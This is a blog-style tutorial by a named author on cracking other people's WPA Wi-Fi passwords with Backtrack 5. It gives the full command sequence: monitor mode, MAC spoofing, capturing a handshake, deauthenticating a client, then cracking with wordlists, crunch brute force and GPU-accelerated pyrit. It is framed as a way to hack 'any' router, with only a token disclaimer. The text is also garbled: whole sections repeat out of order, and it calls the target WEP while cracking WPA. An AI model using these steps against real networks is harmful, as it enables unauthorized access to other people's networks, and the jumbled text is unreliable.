HACK WIFI PASSWORD WITH BACKTRACK 5
Do not Use any router/modem without permission.
Try this method your own risk we are not responsible.
This tutorial only for study purposing.
Wifi tutorial special for Hacking Birds
Hye Friends
Aim Saim , many people ask me, how to hack any wifi router or modem
So, let's learn how to hack the wifi password
certain things to be followed..such as creating virtual machine!!!running in your OS if you have windows..!!
Download VMware Workstation here: download
Create a new virtual machine like i have created...!!!
press enter... go on
At BOOT Menu.... just type startx
an Now your all set to go...just simply follow below steps...now
Rules to Follow:
Steps to Follow:
Step 1:
airmon-ng
The result will be something like :Interface Chipset Driver
wlan0 Intel 5100 iwlagn - [phy0]
Step 2: airmon-ng start wlan0
Step 3 (Optional) :
Change the mac address of the mon0 interface.ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Step 4:
airodump-ng mon0
Then, press "Ctrl+c" to break the program.
Step 5:
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0
*where -c is the channel
-w is the file to be written
--bssid is the BSSID
This terminal is keeping running.
Step 6:
open another terminal.aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0
*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.
Step 7:
Use the John the Ripper as word list to crack the WPA/WP2 password.aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs
Step 8 (Optional): ITS AN OPTIONAL STEP,,,,,,
If you do not want to use John the Ripper as word list, you can use Crunch.
Go to the official site of crunch.http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/
Download crunch 3.0 (the current version at the time of this writing).
Create a new virtual machine like i have created...!!!
an Now your all set to go...just simply follow below steps...now
Rules to Follow:
- A Backtrack Live CD: the Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started.
- Here a link to download it. download
- I highly recommend you to download backtrck 32 bit version coz it runs smoothly in win7 64bit through vmware workstation.
- A nearby WEP-enabled Wi-Fi network
- Patience with the command line. This is an ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.
Steps to Follow:
Step 1:
airmon-ng
The result will be something like :Interface Chipset Driver
wlan0 Intel 5100 iwlagn - [phy0]
Step 2: airmon-ng start wlan0
Step 3 (Optional) :
Change the mac address of the mon0 interface.ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Step 4:
airodump-ng mon0
Then, press "Ctrl+c" to break the program.
Step 5:
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0
*where -c is the channel
-w is the file to be written
--bssid is the BSSID
This terminal is keeping running.
Step 6:
open another terminal.aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0
*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.
Step 7:
Use the John the Ripper as word list to crack the WPA/WP2 password.aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs
Step 8 (Optional): ITS AN OPTIONAL STEP,,,,,,
If you do not want to use John the Ripper as word list, you can use Crunch.
Go to the official site of crunch.http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/
Download crunch 3.0 (the current version at the time of this writing).
download
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -
*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.
(B) nVidia Display Card with CUDA
If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.
Step a:
airmon-ng
The result will be something like :Interface Chipset Driver
wlan0 Intel 5100 iwlagn - [phy0]
Step b:
airmon-ng start wlan0
Step c (Optional):
Change the mac address of the mon0 interface.ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Step d:
airodump-ng mon0
Then, press "Ctrl+c" to break the program.
Step e:
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0
Step f:
open another terminal.aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0
*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.
Step g:
If the following programs are not yet installed, please do it.apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy
Step h:
Go to the official site of crunch.http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/
Download crunch 3.0 (the current version at the time of this writing).
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -
*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.
(B) nVidia Display Card with CUDA
If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.
Step a:
airmon-ng
The result will be something like :Interface Chipset Driver
wlan0 Intel 5100 iwlagn - [phy0]
Step b:
airmon-ng start wlan0
Step c (Optional):
Change the mac address of the mon0 interface.ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Step d:
airodump-ng mon0
Then, press "Ctrl+c" to break the program.
Step e:
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0
Step f:
open another terminal.aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0
*where -a is the BSSID
-c is the client MAC address (STATION)
Wait for the handshake.
Step g:
If the following programs are not yet installed, please do it.apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy
Step h:
Go to the official site of crunch.http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/
Download crunch 3.0 (the current version at the time of this writing).
download
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install
Step i:
Go to the official site of pyrit.http://code.google.com/p/pyrit/downloads/list
Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install
tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install
Step j:
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough
*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.
Step k (Optional) :
If you encounter error when reading the wpacrack-01.cap, you should do the following step.pyrit -r wpacrack-01.cap -o new.cap stripLive
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough
*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.
Step l:
Then, you will see something similar to the following.Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)
Tried 17960898 PMKs so far; 17504 PMKs per second.
Remarks :
If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.
To test if your wireless card (either USB or PCI-e) can do the injection or not :airodump-ng mon0
Open another terminal.aireplay-ng -9 mon0
Make sure pyrit workable on your system :pyrit list_cores
If you face any problem then comments below.
keep visiting for more tutorials.
THANK YOU
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install
Step i:
Go to the official site of pyrit.http://code.google.com/p/pyrit/downloads/list
Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install
tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install
Step j:
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough
*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.
Step k (Optional) :
If you encounter error when reading the wpacrack-01.cap, you should do the following step.pyrit -r wpacrack-01.cap -o new.cap stripLive
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough
*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.
Step l:
Then, you will see something similar to the following.Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+
Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)
Tried 17960898 PMKs so far; 17504 PMKs per second.
Remarks :
If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.
To test if your wireless card (either USB or PCI-e) can do the injection or not :airodump-ng mon0
Open another terminal.aireplay-ng -9 mon0
Make sure pyrit workable on your system :pyrit list_cores
If you face any problem then comments below.
keep visiting for more tutorials.
THANK YOU
We hope you really enjoy this
By: SAIM SULEHRY
By: SAIM SULEHRY
0 comments:
Post a Comment